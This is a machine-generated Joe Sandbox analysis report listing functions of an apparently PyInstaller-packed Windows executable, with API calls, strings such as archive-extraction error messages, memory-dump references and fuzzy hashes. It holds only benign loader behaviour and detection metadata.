Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 7ed3ff2c53b3acb50fad176558a18383b4d3132e3cb2296cf383881a14ce71ee
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: C9C1BE36B38A4185FB50DFA9D6906BD3761FB49BA8F014236DA1E97798CF38D461C700

Function 00007FF6D92383C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D923842B
RemoveDirectoryW.KERNEL32(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D92384AE
DeleteFileW.KERNELBASE(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D92384CD
FindNextFileW.KERNELBASE(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D92384DB
FindClose.KERNELBASE(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D92384EC
RemoveDirectoryW.KERNELBASE(?,00007FF6D9238919,00007FF6D9233FA5), ref: 00007FF6D92384F5

Strings

%s\*, xrefs: 00007FF6D92383F2

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
Instruction ID: 5c79e3394095eaad086c59590d31ee98c4eb6f37d32f6aec9c7fe82d28be4342
Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
Instruction Fuzzy Hash: 95418221A2C98285FE609F74E6441BE6360FB94754F404237DA9DC7AD8EF3CD569C740

Function 00007FF6D9255E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6D9255EAA

Part of subcall function 00007FF6D92555F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D925560C

_get_daylight.LIBCMT ref: 00007FF6D9255EBB

Part of subcall function 00007FF6D9255598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92555AC

_get_daylight.LIBCMT ref: 00007FF6D9255ECC

Part of subcall function 00007FF6D92555C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92555DC

Part of subcall function 00007FF6D924A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A95E
Part of subcall function 00007FF6D924A948: GetLastError.KERNEL32(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A968

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D925610C), ref: 00007FF6D9255EF3

Strings

Eastern Summer Time, xrefs: 00007FF6D9255FB1
Eastern Standard Time, xrefs: 00007FF6D9255F99

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: 6dbedfe280b4d5194f6c524bf1997199eec3ab05c4b405da2183ab45b7d17341
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 48517E32E2864286F760DF61EA815BD7761BF88784F404137EA4DC7A99DF3CE5608740

Function 00007FF6D9239280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6D92392B3
FindClose.KERNELBASE ref: 00007FF6D92392C2

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 133a4cd4e2e13453ab5880cae6d8d1fae538542f5cfa4e0736bb1852a2893039
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 98F0C826E28741C6F7A08F60B58877E7350AB84724F04033AD96D82AD4DF3CD068CB00

Function 00007FF6D92508C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: 0e4294d2c90c50d38b7d355ed00e78deee49c4fe6f2b13678a9ad768a49883d4
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: 7802C021F7E64381FEA5AF119A0027D2690AF45BA0F598637EE5DD63DEDE3CE4218700

Function 00007FF6D9231950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9237F90: _fread_nolock.LIBCMT ref: 00007FF6D923803A

_fread_nolock.LIBCMT ref: 00007FF6D9231A1B

Part of subcall function 00007FF6D9232910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9231B6A), ref: 00007FF6D923295E

Strings

MEI, xrefs: 00007FF6D9231991
Could not read full TOC!, xrefs: 00007FF6D9231B55
calloc, xrefs: 00007FF6D9231A68
fread, xrefs: 00007FF6D9231A32, 00007FF6D9231B5C
Could not allocate memory for archive structure!, xrefs: 00007FF6D9231A61
Could not allocate buffer for TOC!, xrefs: 00007FF6D9231B1B
Error on file., xrefs: 00007FF6D9231B8D
Failed to seek to cookie position!, xrefs: 00007FF6D92319EE
Failed to read cookie!, xrefs: 00007FF6D9231A2B
malloc, xrefs: 00007FF6D9231B22
fseek, xrefs: 00007FF6D92319F5

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 85af813c0b0c69426d4f81882584102d3122cb9bfe94396efcbe029e9c31af02
Instruction ID: 7fc454f65b2479deffcb7b7eb464dc652064e519023a5c35d5b85f2ef62507f0
Opcode Fuzzy Hash: 85af813c0b0c69426d4f81882584102d3122cb9bfe94396efcbe029e9c31af02
Instruction Fuzzy Hash: 8C81A271A2C68686FB60DF34D6412BD23A1EF49784F40443BE98DC778ADE3CE5A58B41

Function 00007FF6D9231600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6D92316A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6D92316DA
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6D9231742
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6D92317CA
fread, xrefs: 00007FF6D92317E6
Failed to create symbolic link %s!, xrefs: 00007FF6D9231622
fopen, xrefs: 00007FF6D9231663
Failed to extract %s: failed to open target file!, xrefs: 00007FF6D923165C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6D92317DF
fwrite, xrefs: 00007FF6D92317D1
malloc, xrefs: 00007FF6D9231749
fseek, xrefs: 00007FF6D92316E1

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: e3191d3c1863fdc148b865684561a8a90bf1fbfb0db1f2a60b60e414af9c3315
Instruction ID: 6d9103b0fb2d1f1ecd0dcf043fde61de9ef59b3dfc960cea21a40299083ebf8b
Opcode Fuzzy Hash: e3191d3c1863fdc148b865684561a8a90bf1fbfb0db1f2a60b60e414af9c3315
Instruction Fuzzy Hash: 2251BF21B2864392FA10AF629A011BD23A0BF55794F84463BEE4C877DADF3CF565CB40

Function 00007FF6D9238660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6D9233CBB), ref: 00007FF6D9238704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6D9233CBB), ref: 00007FF6D923870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6D9233CBB), ref: 00007FF6D923874C

Part of subcall function 00007FF6D9238830: GetEnvironmentVariableW.KERNEL32(00007FF6D923388E), ref: 00007FF6D9238867
Part of subcall function 00007FF6D9238830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6D9238889

Part of subcall function 00007FF6D9248238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9248251

Part of subcall function 00007FF6D9232810: MessageBoxW.USER32 ref: 00007FF6D92328EA

Strings

TMP, xrefs: 00007FF6D92386C2
_MEI%d, xrefs: 00007FF6D9238712
TMP, xrefs: 00007FF6D923869C, 00007FF6D92387A3
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6D923877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6D92386DC

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: bffa7919a29b6d03cb6765fb5c77471ca8f726f0f3f4c2cd1286486c0e877aa2
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: C841B111A3968284FA50EF71AB552BD1291AF997C4F804137ED4DCB7DADE3CE521C740

Function 00007FF6D9231210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6D92312BA
1.3.1, xrefs: 00007FF6D9231249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6D9231276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6D92312EF
malloc, xrefs: 00007FF6D92312C1, 00007FF6D92312F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6D923141E

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: edbc7fc629fea5b907d296325bff14fa59ab7a9c376bf005d102d457c092301b
Instruction ID: ad7ce7ca3c07f7f25cc60a84db0743e5a5e0af9f5c510a71cc93153e832f4bc5
Opcode Fuzzy Hash: edbc7fc629fea5b907d296325bff14fa59ab7a9c376bf005d102d457c092301b
Instruction Fuzzy Hash: 8751EB22A2864245F6609F21E6413BE6291FF86794F44413BEE4DC77DAEF3CE565C700

Function 00007FF6D924ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6D924F0AA,?,?,-00000018,00007FF6D924AD53,?,?,?,00007FF6D924AC4A,?,?,?,00007FF6D9245F3E), ref: 00007FF6D924EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF6D924F0AA,?,?,-00000018,00007FF6D924AD53,?,?,?,00007FF6D924AC4A,?,?,?,00007FF6D9245F3E), ref: 00007FF6D924EE98

Strings

ext-ms-, xrefs: 00007FF6D924EDE9
api-ms-, xrefs: 00007FF6D924EDD6

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 88d6c0f38c6762a316265f6d0262b16a1f1167c25b8b21f24a3cd7430b6c1dfa
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 7741C221B2AA1281FA16DF16AA0057D2295BF69BB0F88453BDD1DD7788EE3CE465C700

Function 00007FF6D92336B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6D9233804), ref: 00007FF6D92336E1
GetLastError.KERNEL32(?,00007FF6D9233804), ref: 00007FF6D92336EB

Part of subcall function 00007FF6D9232C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232C9E
Part of subcall function 00007FF6D9232C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232D63
Part of subcall function 00007FF6D9232C50: MessageBoxW.USER32 ref: 00007FF6D9232D99

Strings

Failed to obtain executable path., xrefs: 00007FF6D92336F3
GetModuleFileNameW, xrefs: 00007FF6D92336FA
Failed to resolve full path to executable %ls., xrefs: 00007FF6D9233739
Failed to convert executable path to UTF-8., xrefs: 00007FF6D9233790
\\?\, xrefs: 00007FF6D923375A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 585cde4fa769333c8d83961654dc639aca5fdce2f323ae01494de5db9d73c94c
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: EA217451B3864291FA60AF31EE113BE2250BF88394F80023BD65DC66E9FE2CE625C740

Function 00007FF6D924BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924BE89

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction ID: e3c25026e63d4993e75f288f816e6889c8efd167e66809481010d392f14b8a76
Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction Fuzzy Hash: 06C1E822A2CB8691FB619F159A442BD3790FFA9B80F554133EA4E83795CF7CE4658F00

Function 00007FF6D9238570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6D9238590
OpenProcessToken.ADVAPI32 ref: 00007FF6D92385A3
GetTokenInformation.KERNELBASE ref: 00007FF6D92385C8
GetLastError.KERNEL32 ref: 00007FF6D92385D2
GetTokenInformation.KERNELBASE ref: 00007FF6D9238612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D923862E
CloseHandle.KERNELBASE ref: 00007FF6D9238646

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: ea71cf5c15827c698b9ff72c8d63b3bb4fcb60906692b64e99bd710ce6cbc6e6
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: 9D212331A1C64642FA509F65B64423EA3A0FFC57A0F544236EA6D87AE8DEBCD4558B00

Function 00007FF6D92390E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9238570: GetCurrentProcess.KERNEL32 ref: 00007FF6D9238590
Part of subcall function 00007FF6D9238570: OpenProcessToken.ADVAPI32 ref: 00007FF6D92385A3
Part of subcall function 00007FF6D9238570: GetTokenInformation.KERNELBASE ref: 00007FF6D92385C8
Part of subcall function 00007FF6D9238570: GetLastError.KERNEL32 ref: 00007FF6D92385D2
Part of subcall function 00007FF6D9238570: GetTokenInformation.KERNELBASE ref: 00007FF6D9238612
Part of subcall function 00007FF6D9238570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D923862E
Part of subcall function 00007FF6D9238570: CloseHandle.KERNELBASE ref: 00007FF6D9238646

LocalFree.KERNEL32(?,00007FF6D9233C55), ref: 00007FF6D923916C
LocalFree.KERNEL32(?,00007FF6D9233C55), ref: 00007FF6D9239175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6D9239142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6D9239183
D:(A;;FA;;;%s), xrefs: 00007FF6D9239157
S-1-3-4, xrefs: 00007FF6D9239121

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction ID: 506c93817f1fb42e98359a76715fe5b914496ca71eabfce2d43afaf5c60b5b79
Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction Fuzzy Hash: 1D215135A2878281F650AF20EA152FE6265FF88780F44413BEA4DD7B96DF3CD965C780

Function 00007FF6D9237E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF6D923352C,?,00000000,00007FF6D9233F23), ref: 00007FF6D9237F32

Strings

%s%c, xrefs: 00007FF6D9237EA4
%.*s, xrefs: 00007FF6D9237EEB
\, xrefs: 00007FF6D9237E97

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

